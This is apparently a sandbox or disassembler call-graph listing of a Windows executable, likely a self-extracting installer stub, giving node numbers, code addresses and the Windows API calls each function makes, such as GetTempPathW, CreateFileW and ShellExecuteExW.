9280->9301 9281 405a9f GetKeyState 9281->9308 9282 405c6c 9285 405ca2 9282->9285 9286 405c74 9282->9286 9283 401329 ??2@YAPAXI ??3@YAXPAX 9283->9308 9284 40243b lstrcmpW 9284->9308 9289 4012f7 2 API calls 9285->9289 9798 403f85 9286->9798 9292 405cb0 9289->9292 9295 403b59 15 API calls 9292->9295 9293 401362 2 API calls 9299 405c91 ??3@YAXPAX 9293->9299 9294->9170 9297 405cb9 9295->9297 9296 407776 55 API calls 9298 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9296->9298 9300 405cca ??3@YAXPAX 9297->9300 9304 401362 2 API calls 9297->9304 9298->9301 9305 405cd9 9299->9305 9300->9305 9301->9296 9302 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9301->9302 9302->9301 9303 405bcd ??3@YAXPAX 9303->9308 9304->9300 9306 405d24 9305->9306 9307 405d16 9305->9307 9811 40786b 9306->9811 9594 404a44 9307->9594 9308->9277 9308->9280 9308->9281 9308->9282 9308->9283 9308->9284 9308->9301 9308->9302 9308->9303 9311 401429 ??2@YAPAXI ??3@YAXPAX 9308->9311 9783 407613 9308->9783 9792 407674 9308->9792 9311->9308 9312 405d20 9313 405d65 9312->9313 9817 403e0d 9312->9817 9314 404034 21 API calls 9313->9314 9316 405d77 9314->9316 9318 406373 9316->9318 9319 401411 2 API calls 9316->9319 9321 4063f7 ctype 9318->9321 9324 40243b lstrcmpW 9318->9324 9320 405d95 9319->9320 9364 405da8 9320->9364 9821 40453e 9320->9821 9323 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9321->9323 9329 40243b lstrcmpW 9321->9329 9325 406461 9323->9325 9326 406467 ??3@YAXPAX 9323->9326 9327 4063a4 9324->9327 9325->9326 9328 403e70 ctype 4 API calls 9326->9328 9327->9321 9848 403f48 9327->9848 9330 406478 ??3@YAXPAX ??3@YAXPAX 9328->9330 9332 406416 9329->9332 9330->9132 9331 401411 ??2@YAPAXI ??3@YAXPAX 9331->9364 9332->9323 9336 406423 9332->9336 9335 405dd8 9338 405de5 9335->9338 9339 4061fa ??3@YAXPAX ??3@YAXPAX 9335->9339 9341 4012f7 2 API calls 9336->9341 9337 4073d1 21 API calls 9342 4063e0 ??3@YAXPAX 9337->9342 9830 4043c6 9338->9830 9343 406312 9339->9343 9340 40243b lstrcmpW 9340->9364 9345 406432 9341->9345 9342->9321 9349 40636a ??3@YAXPAX 9343->9349 9350 404034 21 API calls 9343->9350 9853 404aff 9345->9853 9348 405e45 9352 401329 2 API calls 9348->9352 9349->9318 9354 406321 9350->9354 9355 405e4e 9352->9355 9353 4043c6 2 API calls 9356 405e0e 9353->9356 9838 4048ab 9354->9838 9360 403b7f 19 API calls 9355->9360 9361 401362 2 API calls 9356->9361 9358 40626b ??3@YAXPAX ??3@YAXPAX 9358->9343 9359 401329 2 API calls 9359->9364 9378 405e57 9360->9378 9362 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9361->9362 9365 406211 9362->9365 9366 405e41 9362->9366 9363 40633a SetCurrentDirectoryW 9367 4048ab 4 API calls 9363->9367 9364->9331 9364->9335 9364->9340 9364->9348 9364->9358 9364->9359 9368 401429 2 API calls 9364->9368 9371 403e0d 16 API calls 9365->9371 9366->9348 9369 406362 9367->9369 9370 405ee5 ??3@YAXPAX ??3@YAXPAX 9368->9370 9372 403e0d 16 API calls 9369->9372 9370->9364 9373 406216 9371->9373 9372->9349 9374 407776 55 API calls 9373->9374 9375 40621f 7 API calls 9374->9375 9376 40625e 9375->9376 9376->9358 9377 403bce lstrlenW lstrlenW _wcsnicmp 9377->9378 9378->9377 9379 405f61 _wtol 9378->9379 9380 406025 9378->9380 9379->9378 9381 406080 9380->9381 9382 40602e 9380->9382 9383 401362 2 API calls 9381->9383 9384 406053 9382->9384 9385 406034 9382->9385 9386 40607e 9383->9386 9388 401329 2 API calls 9384->9388 9387 401329 2 API calls 9385->9387 9389 40254d 2 API calls 9386->9389 9390 40603f 9387->9390 9391 406051 9388->9391 9392 406092 9389->9392 9393 40254d 2 API calls 9390->9393 9394 40243b lstrcmpW 9391->9394 9395 401411 2 API calls 9392->9395 9396 406048 9393->9396 9397 406068 9394->9397 9398 40609a 9395->9398 9399 40254d 2 API calls 9396->9399 9397->9392 9401 40254d 2 API calls 9397->9401 9400 401411 2 API calls 9398->9400 9399->9391 9402 4060a2 memset 9400->9402 9401->9386 9403 4060e1 9402->9403 9404 404594 2 API calls 9403->9404 9405 4060fe 9404->9405 9406 401329 2 API calls 9405->9406 9407 406109 9406->9407 9408 403b7f 19 API calls 9407->9408 9409 406112 9408->9409 9410 4061b1 9409->9410 9614 4021ed 9409->9614 9412 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9412 9414 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9414 9412->9343 9414->9339 9415 406150 9417 403b7f 19 API calls 9415->9417 9416 401429 2 API calls 9418 406147 9416->9418 9419 406168 ShellExecuteExW 9417->9419 9420 40254d 2 API calls 9418->9420 9422 406282 9419->9422 9423 40618c 9419->9423 9420->9415 9426 407776 55 API calls 9422->9426 9424 4061a0 CloseHandle 9423->9424 9425 406192 WaitForSingleObject 9423->9425 9835 402185 9424->9835 9425->9424 9428 40628c 9426->9428 9429 403e0d 16 API calls 9428->9429 9430 406291 9 API calls 9429->9430 9431 4062e1 9430->9431 9431->9412 9433 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9432->9433 9434 401b9f GetVersionExW 9432->9434 9433->9434 9434->9130 9434->9131 9436 40112b 2 API calls 9435->9436 9437 403e38 GetCommandLineW 9436->9437 9438 404594 9437->9438 9439 4045ce 9438->9439 9441 4045a2 9438->9441 9440 4045c6 9439->9440 9443 401429 2 API calls 9439->9443 9440->9142 9441->9440 9442 401429 2 API calls 9441->9442 9442->9441 9443->9439 9445 401411 2 API calls 9444->9445 9453 402a79 9445->9453 9446 401362 2 API calls 9447 402b6c ??3@YAXPAX 9446->9447 9447->9145 9448 402b5f 9448->9446 9450 401411 2 API calls 9450->9453 9451 401429 ??2@YAPAXI ??3@YAXPAX 9451->9453 9453->9448 9453->9450 9453->9451 9454 401362 2 API calls 9453->9454 9892 4025c6 9453->9892 9895 40272e 9453->9895 9455 402ad9 ??3@YAXPAX 9454->9455 9456 4013e2 2 API calls 9455->9456 9457 402aee ??3@YAXPAX ??3@YAXPAX 9456->9457 9457->9453 9459 403d80 9458->9459 9460 403dbd 9459->9460 9461 403d9a lstrlenW lstrlenW 9459->9461 9460->9149 9460->9151 9906 401a85 9461->9906 9464 401f47 3 API calls 9463->9464 9465 404416 9464->9465 9466 401f9d 19 API calls 9465->9466 9467 40441d 9466->9467 9468 401f9d 19 API calls 9467->9468 9469 404429 9468->9469 9470 401f9d 19 API calls 9469->9470 9471 404435 9470->9471 9472 401f9d 19 API calls 9471->9472 9473 404441 9472->9473 9474 401f9d 19 API calls 9473->9474 9475 40444d 9474->9475 9476 401f9d 19 API calls 9475->9476 9477 404459 9476->9477 9478 401f9d 19 API calls 9477->9478 9479 404465 9478->9479 9480 404480 SHGetSpecialFolderPathW 9479->9480 9483 404533 #17 9479->9483 9484 401411 2 API calls 9479->9484 9485 401329 ??2@YAPAXI ??3@YAXPAX 9479->9485 9487 402f6c 7 API calls 9479->9487 9911 402425 ??3@YAXPAX ??3@YAXPAX 9479->9911 9480->9479 9481 40449a wsprintfW 9480->9481 9482 401411 2 API calls 9481->9482 9482->9479 9483->9150 9484->9479 9485->9479 9487->9479 9489 4022b0 2 API calls 9488->9489 9490 4025c2 9489->9490 9490->9194 9912 403e86 9491->9912 9493 404e56 9494 403e86 2 API calls 9493->9494 9495 404e65 9494->9495 9916 404343 9495->9916 9499 404e82 ??3@YAXPAX 9500 404343 3 API calls 9499->9500 9501 404e9d 9500->9501 9502 403ec1 2 API calls 9501->9502 9503 404ea8 ??3@YAXPAX wsprintfA 9502->9503 9932 403ef6 9503->9932 9505 404ed0 9506 403ef6 2 API calls 9505->9506 9507 404edb 9506->9507 9508 402844 9507->9508 9509 402851 9508->9509 9517 40dcfb 3 API calls 9509->9517 9510 402863 lstrlenA lstrlenA 9515 402890 9510->9515 9511 40296e 9511->9206 9511->9208 9512 40293b memmove 9512->9511 9512->9515 9513 4028db memcmp 9513->9511 9513->9515 9514 402918 memcmp 9514->9515 9515->9511 9515->9512 9515->9513 9515->9514 9518 40dcc7 GetLastError 9515->9518 9943 402640 9515->9943 9517->9510 9518->9515 9520 40243b lstrcmpW 9519->9520 9521 40461c 9520->9521 9522 40466c 9521->9522 9524 401329 2 API calls 9521->9524 9523 40243b lstrcmpW 9522->9523 9525 40468a 9523->9525 9526 404633 9524->9526 9528 40243b lstrcmpW 9525->9528 9527 401f9d 19 API calls 9526->9527 9529 40463a 9527->9529 9531 4046a2 9528->9531 9530 40254d 2 API calls 9529->9530 9532 404643 9530->9532 9533 40243b lstrcmpW 9531->9533 9534 401329 2 API calls 9532->9534 9535 4046ba 9533->9535 9536 40465c 9534->9536 9538 40243b lstrcmpW 9535->9538 9537 401f9d 19 API calls 9536->9537 9539 404663 9537->9539 9540 4046d2 9538->9540 9541 40254d 2 API calls 9539->9541 9542 4046e9 9540->9542 9543 4046d9 lstrcmpiW 9540->9543 9541->9522 9544 40243b lstrcmpW 9542->9544 9543->9542 9545 4046ff 9544->9545 9546 40243b lstrcmpW 9545->9546 9547 40472c 9546->9547 9550 404739 9547->9550 9946 403d1f 9547->9946 9549 40243b lstrcmpW 9554 40474d 9549->9554 9550->9549 9551 40476d 9553 40243b lstrcmpW 9551->9553 9559 404780 9553->9559 9554->9551 9555 40243b lstrcmpW 9554->9555 9950 403cc6 9554->9950 9555->9554 9556 4047a0 9558 40243b lstrcmpW 9556->9558 9560 4047ac 9558->9560 9559->9556 9561 40243b lstrcmpW 9559->9561 9954 403cf7 9559->9954 9562 40243b lstrcmpW 9560->9562 9561->9559 9563 4047bd 9562->9563 9564 40243b lstrcmpW 9563->9564 9565 4047ce 9564->9565 9566 4047e4 9565->9566 9567 4047db _wtol 9565->9567 9568 40243b lstrcmpW 9566->9568 9567->9566 9569 4047f0 9568->9569 9570 404800 9569->9570 9571 4047f7 _wtol 9569->9571 9572 40243b lstrcmpW 9570->9572 9571->9570 9573 40480c 9572->9573 9574 40243b lstrcmpW 9573->9574 9575 404824 9574->9575 9576 40243b lstrcmpW 9575->9576 9577 40483c 9576->9577 9577->9265 9962 4023dd 9578->9962 9582 404045 9581->9582 9583 404088 9581->9583 9584 4012f7 2 API calls 9582->9584 9585 403b7f 19 API calls 9582->9585 9583->9245 9583->9246 9584->9582 9586 404062 SetEnvironmentVariableW ??3@YAXPAX 9585->9586 9586->9582 9586->9583 9588 40393b 7 API calls 9587->9588 9589 403b69 9588->9589 9590 4039f6 7 API calls 9589->9590 9591 403b74 9590->9591 9592 4027c7 6 API calls 9591->9592 9593 403b7a 9592->9593 9593->9266 9739 4083b6 9593->9739 9966 408676 9594->9966 9596 404a55 ??2@YAPAXI 9597 404a64 9596->9597 9611 40dcfb 3 API calls 9597->9611 9598 404a85 9968 40a7de _EH_prolog 9598->9968 9984 40b2fc 9598->9984 9599 404a95 9600 404ab3 9599->9600 9601 404a99 9599->9601 9603 404ada ??2@YAPAXI 9600->9603 9607 403354 86 API calls 9600->9607 9602 407776 55 API calls 9601->9602 9606 404aa1 9602->9606 9604 404ae6 9603->9604 9605 404aed 9603->9605 10009 404292 9604->10009 9990 40150b 9605->9990 9606->9312 9609 404ac6 9607->9609 9609->9603 9609->9606 9611->9598 9615 402200 LoadLibraryA GetProcAddress 9614->9615 9616 4021fb 9614->9616 9617 40221b 9615->9617 9618 402223 9615->9618 9616->9410 9616->9415 9616->9416 9617->9616 9618->9617 10472 4021b9 LoadLibraryA GetProcAddress 9618->10472 9621 40661a 2 API calls 9620->9621 9622 4049af 9621->9622 9623 401f9d 19 API calls 9622->9623 9624 4049bd 9623->9624 9625 4024fc 2 API calls 9624->9625 9626 4049c7 9625->9626 9627 4049fd 9626->9627 9629 40254d ??2@YAPAXI ??3@YAXPAX 9626->9629 9628 40254d 2 API calls 9627->9628 9630 404a0a 9628->9630 9629->9626 9631 401f9d 19 API calls 9630->9631 9632 404a11 9631->9632 9633 40254d 2 API calls 9632->9633 9634 404a1b 9633->9634 9635 4073d1 21 API calls 9634->9635 9636 404a30 ??3@YAXPAX 9635->9636 9637 404a41 ctype 9636->9637 9637->9170 9639 40e8da ctype 3 API calls 9638->9639 9640 403e7e 9639->9640 9641 40e8da ctype 3 API calls 9640->9641 9642 40e943 ??3@YAXPAX 9641->9642 9642->9164 9644 40db53 2 API calls 9643->9644 9645 404ce8 9644->9645 9646 404d44 9645->9646 9648 4024fc 2 API calls 9645->9648 9647 4025ae 2 API calls 9646->9647 9649 404d4c 9647->9649 9650 404cf7 9648->9650 9651 403e86 2 API calls 9649->9651 9654 404db5 ??3@YAXPAX 9650->9654 9656 403354 86 API calls 9650->9656 9652 404d59 9651->9652 9653 403ef6 2 API calls 9652->9653 9655 404d66 9653->9655 9668 404db1 9654->9668 9657 403ef6 2 API calls 9655->9657 9658 404d1b 9656->9658 9659 404d73 9657->9659 9658->9654 9661 40db53 2 API calls 9658->9661 9660 403ef6 2 API calls 9659->9660 9662 404d80 9660->9662 9663 404d37 9661->9663 9664 40dd5f 2 API calls 9662->9664 9663->9654 9665 404d3b ??3@YAXPAX 9663->9665 9666 404d94 9664->9666 9665->9646 9666->9654 9667 404d9d ??3@YAXPAX 9666->9667 9667->9668 9668->9229 9670 4025ae 2 API calls 9669->9670 9686 4030a8 9670->9686 9671 403301 9672 403344 ??3@YAXPAX 9671->9672 9673 40334e 9672->9673 9673->9215 9673->9221 9674 401411 ??2@YAPAXI ??3@YAXPAX 9674->9686 9676 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9676->9686 9677 401362 2 API calls 9678 4030f3 ??3@YAXPAX ??3@YAXPAX 9677->9678 9679 403303 9678->9679 9678->9686 10480 4029c3 9679->10480 9683 40331c ??3@YAXPAX 9683->9673 9684 4031e5 strncmp 9685 4031d0 strncmp 9684->9685 9684->9686 9685->9684 9685->9686 9686->9671 9686->9674 9686->9676 9686->9677 9686->9679 9686->9684 9687 401362 2 API calls 9686->9687 9688 402640 2 API calls 9686->9688 9691 402640 ??2@YAPAXI ??3@YAXPAX 9686->9691 9693 4023dd lstrcmpW 9686->9693 9694 402f6c 7 API calls 9686->9694 9696 403330 9686->9696 9697 4032b2 lstrcmpW 9686->9697 9701 401329 2 API calls 9686->9701 10474 402986 9686->10474 10479 402425 ??3@YAXPAX ??3@YAXPAX 9686->10479 9689 403252 ??3@YAXPAX 9687->9689 9688->9685 9690 402a69 9 API calls 9689->9690 9692 403263 lstrcmpW 9690->9692 9691->9686 9692->9686 9693->9686 9694->9686 9699 402f6c 7 API calls 9696->9699 9697->9686 9698 4032c0 lstrcmpW 9697->9698 9698->9686 9700 40333c 9699->9700 10498 402425 ??3@YAXPAX ??3@YAXPAX 9700->10498 9701->9686 9704 402f86 9703->9704 9705 402f7b 9703->9705 9707 408761 4 API calls 9704->9707 10500 402668 9705->10500 9708 402f92 9707->9708 9708->9219 9709->9219 9711 4024fc 2 API calls 9710->9711 9712 40485f 9711->9712 9713 40254d 2 API calls 9712->9713 9714 40486c 9713->9714 9715 404888 9714->9715 9716 401429 2 API calls 9714->9716 9717 40254d 2 API calls 9715->9717 9716->9714 9718 404892 9717->9718 9719 40408b 94 API calls 9718->9719 9720 40489d ??3@YAXPAX 9719->9720 9720->9265 9722 4040a2 lstrlenW 9721->9722 9723 4040ce 9721->9723 9724 401a85 4 API calls 9722->9724 9723->9265 9725 4040b8 9724->9725 9725->9722 9725->9723 9726 4040d5 9725->9726 9727 4024fc 2 API calls 9726->9727 9730 4040de 9727->9730 10505 402776 9730->10505 9731 403093 84 API calls 9732 40414c 9731->9732 9733 404156 ??3@YAXPAX ??3@YAXPAX 9732->9733 9734 40416d ??3@YAXPAX ??3@YAXPAX 9732->9734 9733->9723 9734->9723 9735->9276 9737 40661a 2 API calls 9736->9737 9738 403b48 9737->9738 9738->9263 9740 408646 9739->9740 9752 4083d5 ctype 9739->9752 9740->9272 9741 40661a 2 API calls 9741->9752 9742 40243b lstrcmpW 9742->9752 9743 40786b 23 API calls 9743->9752 9745 407674 23 API calls 9745->9752 9746 407613 23 API calls 9746->9752 9747 403b40 2 API calls 9747->9752 9748 401f9d 19 API calls 9748->9752 9749 403f48 4 API calls 9749->9752 9750 4073d1 21 API calls 9750->9752 9751 407776 55 API calls 9751->9752 9752->9740 9752->9741 9752->9742 9752->9743 9752->9745 9752->9746 9752->9747 9752->9748 9752->9749 9752->9750 9752->9751 9753 407717 25 API calls 9752->9753 9754 4073d1 21 API calls 9752->9754 10515 40744b 9752->10515 9753->9752 9755 408476 ??3@YAXPAX 9754->9755 9755->9752 9757 40243b lstrcmpW 9756->9757 9758 4082fd 9757->9758 9759 40830b 9758->9759 10519 4019f0 GetStdHandle WriteFile 9758->10519 9761 40831e 9759->9761 10520 4019f0 GetStdHandle WriteFile 9759->10520 9763 408333 9761->9763 10521 4019f0 GetStdHandle WriteFile 9761->10521 9767 408344 9763->9767 10522 4019f0 GetStdHandle WriteFile 9763->10522 9765 40243b lstrcmpW 9769 408351 9765->9769 9767->9765 9768 40835f 9771 40243b lstrcmpW 9768->9771 9769->9768 10523 4019f0 GetStdHandle WriteFile 9769->10523 9772 40836c 9771->9772 9773 40837a 9772->9773 10524 4019f0 GetStdHandle WriteFile 9772->10524 9775 40243b lstrcmpW 9773->9775 9776 408387 9775->9776 9777 408395 9776->9777 10525 4019f0 GetStdHandle WriteFile 9776->10525 9779 40243b lstrcmpW 9777->9779 9780 4083a2 9779->9780 9781 4083b2 9780->9781 10526 4019f0 GetStdHandle WriteFile 9780->10526 9781->9266 9784 407636 9783->9784 9785 407658 9784->9785 9786 40764b 9784->9786 10530 407186 9785->10530 10527 407154 9786->10527 9789 407653 9790 4073d1 21 API calls 9789->9790 9791 407671 9790->9791 9791->9308 9793 407689 9792->9793 9794 40716d 2 API calls 9793->9794 9795 407694 9794->9795 9796 4073d1 21 API calls 9795->9796 9797 4076a5 9796->9797 9797->9308 9799 401411 2 API calls 9798->9799 9800 403f96 9799->9800 9801 402535 2 API calls 9800->9801 9802 403f9f GetTempPathW 9801->9802 9803 403fb8 9802->9803 9808 403fcf 9802->9808 9804 402535 2 API calls 9803->9804 9805 403fc3 GetTempPathW 9804->9805 9805->9808 9806 402535 2 API calls 9807 403ff2 wsprintfW 9806->9807 9807->9808 9808->9806 9809 404009 GetFileAttributesW 9808->9809 9810 40402d 9808->9810 9809->9808 9809->9810 9810->9293 9812 40787e 9811->9812 10536 40719f 9812->10536 9815 4073d1 21 API calls 9816 4078b3 9815->9816 9816->9312 9818 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9817->9818 9819 403e16 9817->9819 9818->9313 9820 402c86 16 API calls 9819->9820 9820->9818 9822 40243b lstrcmpW 9821->9822 9823 40455d 9822->9823 9824 404592 9823->9824 9825 401329 2 API calls 9823->9825 9824->9364 9826 40456c 9825->9826 9827 403b7f 19 API calls 9826->9827 9828 404572 9827->9828 9828->9824 9829 401429 2 API calls 9828->9829 9829->9824 9831 4012f7 2 API calls 9830->9831 9832 4043d4 9831->9832 9833 40254d 2 API calls 9832->9833 9834 4043df 9833->9834 9834->9353 9836 4021a9 9835->9836 9837 40218e LoadLibraryA GetProcAddress 9835->9837 9836->9410 9837->9836 9839 401411 2 API calls 9838->9839 9846 4048bc 9839->9846 9840 401329 2 API calls 9840->9846 9841 40494e 9842 404988 ??3@YAXPAX 9841->9842 9844 4048ab 3 API calls 9841->9844 9842->9363 9843 401429 2 API calls 9843->9846 9845 404985 9844->9845 9845->9842 9846->9840 9846->9841 9846->9843 9847 40243b lstrcmpW 9846->9847 9847->9846 9849 40661a 2 API calls 9848->9849 9850 403f50 9849->9850 9851 401411 2 API calls 9850->9851 9852 403f5e 9851->9852 9852->9337 9854 404cb1 ??3@YAXPAX 9853->9854 9855 404b15 9853->9855 9857 404cb7 9854->9857 9855->9854 9856 404b29 GetDriveTypeW 9855->9856 9856->9854 9858 404b55 9856->9858 9857->9323 9859 403f85 6 API calls 9858->9859 9860 404b63 CreateFileW 9859->9860 9861 404b89 9860->9861 9862 404c7b ??3@YAXPAX ??3@YAXPAX 9860->9862 9863 401411 2 API calls 9861->9863 9862->9857 9864 404b92 9863->9864 9865 401329 2 API calls 9864->9865 9866 404b9f 9865->9866 9867 40254d 2 API calls 9866->9867 9868 404bad 9867->9868 9869 4013e2 2 API calls 9868->9869 9870 404bb9 9869->9870 9871 40254d 2 API calls 9870->9871 9872 404bc7 9871->9872 9873 40254d 2 API calls 9872->9873 9874 404bd4 9873->9874 9875 4013e2 2 API calls 9874->9875 9876 404be0 9875->9876 9877 40254d 2 API calls 9876->9877 9878 404bed 9877->9878 9879 40254d 2 API calls 9878->9879 9880 404bf6 9879->9880 9881 4013e2 2 API calls 9880->9881 9882 404c02 9881->9882 9883 40254d 2 API calls 9882->9883 9884 404c0b 9883->9884 9885 402776 3 API calls 9884->9885 9886 404c1d WriteFile ??3@YAXPAX CloseHandle 9885->9886 9887 404c4b 9886->9887 9888 404c8c 9886->9888 9887->9888 9889 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9887->9889 9890 402c86 16 API calls 9888->9890 9889->9862 9891 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9890->9891 9891->9857 9901 4022b0 9892->9901 9896 401411 2 API calls 9895->9896 9897 40273a 9896->9897 9898 402772 9897->9898 9899 402535 2 API calls 9897->9899 9898->9453 9900 402757 MultiByteToWideChar 9899->9900 9900->9898 9902 4022be ??2@YAPAXI 9901->9902 9903 4022ea 9901->9903 9902->9903 9904 4022cf ??3@YAXPAX 9902->9904 9903->9453 9904->9903 9907 401ae3 9906->9907 9910 401a97 9906->9910 9907->9460 9908 401abc CharUpperW CharUpperW 9909 401af3 CharUpperW CharUpperW 9908->9909 9908->9910 9909->9907 9910->9907 9910->9908 9911->9479 9913 403e9e 9912->9913 9914 4022b0 2 API calls 9913->9914 9915 403eac 9914->9915 9915->9493 9917 40435e 9916->9917 9918 404375 9917->9918 9919 40436a 9917->9919 9920 4025ae 2 API calls 9918->9920 9936 4025f6 9919->9936 9922 40437e 9920->9922 9923 4022b0 2 API calls 9922->9923 9924 404387 9923->9924 9926 4025f6 2 API calls 9924->9926 9925 404373 9928 403ec1 9925->9928 9927 4043b5 ??3@YAXPAX 9926->9927 9927->9925 9929 403ecd 9928->9929 9931 403ede 9928->9931 9930 4022b0 2 API calls 9929->9930 9930->9931 9931->9499 9933 403f06 9932->9933 9933->9933 9939 4022fc 9933->9939 9935 403f13 9935->9505 9937 4022b0 2 API calls 9936->9937 9938 402610 9937->9938 9938->9925 9940 402340 9939->9940 9941 402310 9939->9941 9940->9935 9942 4022b0 2 API calls 9941->9942 9942->9940 9944 4022fc 2 API calls 9943->9944 9945 40264a 9944->9945 9945->9515 9947 403d3d 9946->9947 9958 403c63 9947->9958 9951 403cd3 9950->9951 9952 403c63 _wtol 9951->9952 9953 403cf4 9952->9953 9953->9554 9955 403d04 9954->9955 9956 403c63 _wtol 9955->9956 9957 403d1c 9956->9957 9957->9559 9959 403c6d 9958->9959 9960 403c88 _wtol 9959->9960 9961 403cc1 9959->9961 9960->9959 9961->9550 9963 4023e8 9962->9963 9964 4023f4 lstrcmpW 9963->9964 9965 402411 9963->9965 9964->9963 9964->9965 9965->9268 9967 408679 9966->9967 9967->9596 9969 40a7fe 9968->9969 9970 40b2fc 11 API calls 9969->9970 9971 40a823 9970->9971 9972 40a845 9971->9972 9973 40a82c 9971->9973 10014 40cc59 _EH_prolog 9972->10014 10017 40a3fe 9973->10017 9985 40b30d 9984->9985 9989 40dcfb 3 API calls 9985->9989 9986 40b321 9987 40b331 9986->9987 10453 40b163 9986->10453 9987->9599 9989->9986 9991 40151e 9990->9991 9992 401329 2 API calls 9991->9992 9993 40152b 9992->9993 9994 401429 2 API calls 9993->9994 9995 401534 CreateThread 9994->9995 9996 401563 9995->9996 9997 401568 WaitForSingleObject 9995->9997 10466 40129c 9995->10466 9998 40786b 23 API calls 9996->9998 9999 401585 9997->9999 10000 4015b7 9997->10000 9998->9997 10003 4015a3 9999->10003 10006 401594 9999->10006 10001 4015b3 10000->10001 10002 4015bf GetExitCodeThread 10000->10002 10001->9606 10004 4015d6 10002->10004 10005 407776 55 API calls 10003->10005 10004->10001 10004->10006 10007 401605 SetLastError 10004->10007 10005->10001 10006->10001 10008 407776 55 API calls 10006->10008 10007->10006 10008->10001 10010 401411 2 API calls 10009->10010 10011 4042ab 10010->10011 10012 401411 2 API calls 10011->10012 10013 4042b7 10012->10013 10013->9605 10025 40c9fc 10014->10025 10436 40a28e 10017->10436 10047 40a0bf 10025->10047 10181 40a030 10047->10181 10182 40e8da ctype 3 API calls 10181->10182 10183 40a039 10182->10183 10184 40e8da ctype 3 API calls 10183->10184 10185 40a041 10184->10185 10186 40e8da ctype 3 API calls 10185->10186 10187 40a049 10186->10187 10188 40e8da ctype 3 API calls 10187->10188 10189 40a051 10188->10189 10190 40e8da ctype 3 API calls 10189->10190 10191 40a059 10190->10191 10192 40e8da ctype 3 API calls 10191->10192 10193 40a061 10192->10193 10194 40e8da ctype 3 API calls 10193->10194 10195 40a06b 10194->10195 10196 40e8da ctype 3 API calls 10195->10196 10197 40a073 10196->10197 10198 40e8da ctype 3 API calls 10197->10198 10199 40a080 10198->10199 10200 40e8da ctype 3 API calls 10199->10200 10201 40a088 10200->10201 10202 40e8da ctype 3 API calls 10201->10202 10203 40a095 10202->10203 10204 40e8da ctype 3 API calls 10203->10204 10205 40a09d 10204->10205 10206 40e8da ctype 3 API calls 10205->10206 10207 40a0aa 10206->10207 10208 40e8da ctype 3 API calls 10207->10208 10209 40a0b2 10208->10209 10437 40e8da ctype 3 API calls 10436->10437 10438 40a29c 10437->10438 10454 40f0b6 GetLastError 10453->10454 10456 40b17e 10454->10456 10455 40b192 10455->9987 10456->10455 10457 40adc3 3 API calls 10456->10457 10458 40b1b6 memcpy 10457->10458 10463 40b1d9 10458->10463 10459 40b297 ??3@YAXPAX 10459->10455 10460 40b2a2 ??3@YAXPAX 10460->10455 10462 40b27a memmove 10462->10463 10463->10459 10463->10460 10463->10462 10464 40b2ac memcpy 10463->10464 10465 40dcfb 3 API calls 10464->10465 10465->10460 10467 4012a5 10466->10467 10468 4012b8 10466->10468 10467->10468 10469 4012a7 Sleep 10467->10469 10470 4012f1 10468->10470 10471 4012e3 EndDialog 10468->10471 10469->10467 10471->10470 10473 4021db 10472->10473 10473->9617 10475 4025ae 2 API calls 10474->10475 10476 402992 10475->10476 10477 4029be 10476->10477 10478 402640 2 API calls 10476->10478 10477->9686 10478->10476 10479->9686 10481 4029d2 10480->10481 10482 4029de 10480->10482 10499 4019f0 GetStdHandle WriteFile 10481->10499 10484 4025ae 2 API calls 10482->10484 10488 4029e8 10484->10488 10485 4029d9 10497 402425 ??3@YAXPAX ??3@YAXPAX 10485->10497 10486 402a13 10487 40272e 3 API calls 10486->10487 10489 402a25 10487->10489 10488->10486 10492 402640 2 API calls 10488->10492 10490 402a33 10489->10490 10491 402a47 10489->10491 10493 407776 55 API calls 10490->10493 10494 407776 55 API calls 10491->10494 10492->10488 10495 402a42 ??3@YAXPAX ??3@YAXPAX 10493->10495 10494->10495 10495->10485 10497->9683 10498->9672 10499->10485 10501 4012f7 2 API calls 10500->10501 10502 402676 10501->10502 10503 4012f7 2 API calls 10502->10503 10504 402682 10503->10504 10504->9704 10506 4025ae 2 API calls 10505->10506 10507 402785 10506->10507 10508 4027c1 10507->10508 10511 402628 10507->10511 10508->9731 10512 402634 10511->10512 10513 40263a WideCharToMultiByte 10511->10513 10514 4022b0 2 API calls 10512->10514 10513->10508 10514->10513 10516 407456 10515->10516 10517 40745b 10515->10517 10516->9752 10517->10516 10518 4073d1 21 API calls 10517->10518 10518->10516 10519->9759 10520->9761 10521->9763 10522->9767 10523->9768 10524->9773 10525->9777 10526->9781 10528 40661a 2 API calls 10527->10528 10529 40715c 10528->10529 10529->9789 10533 40716d 10530->10533 10534 40661a 2 API calls 10533->10534 10535 407175 10534->10535 10535->9789 10537 40661a 2 API calls 10536->10537 10538 4071a7 10537->10538 10538->9815 8035 40f3f1 8038 4024e7 8035->8038 8043 40245a 8038->8043 8041 4024f5 8042 4024f6 malloc 8044 40246a 8043->8044 8050 402466 8043->8050 8045 40247a GlobalMemoryStatusEx 8044->8045 8044->8050 8046 402488 8045->8046 8045->8050 8046->8050 8051 401f9d 8046->8051 8050->8041 8050->8042 8052 401fb4 8051->8052 8053 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8052->8053 8057 401fdb 8052->8057 8054 402095 SetLastError 8053->8054 8055 40201d ??2@YAPAXI GetEnvironmentVariableW 8053->8055 8054->8057 8058 4020ac 8054->8058 8056 40204c GetLastError 8055->8056 8069 40207e ??3@YAXPAX 8055->8069 8059 402052 8056->8059 8056->8069 8071 407717 8057->8071 8061 4020cb lstrlenA ??2@YAPAXI 8058->8061 8078 401f47 8058->8078 8064 402081 8059->8064 8065 40205c lstrcmpiW 8059->8065 8062 402136 MultiByteToWideChar 8061->8062 8063 4020fc GetLocaleInfoW 8061->8063 8062->8057 8063->8062 8067 402123 _wtol 8063->8067 8064->8054 8068 40206b ??3@YAXPAX 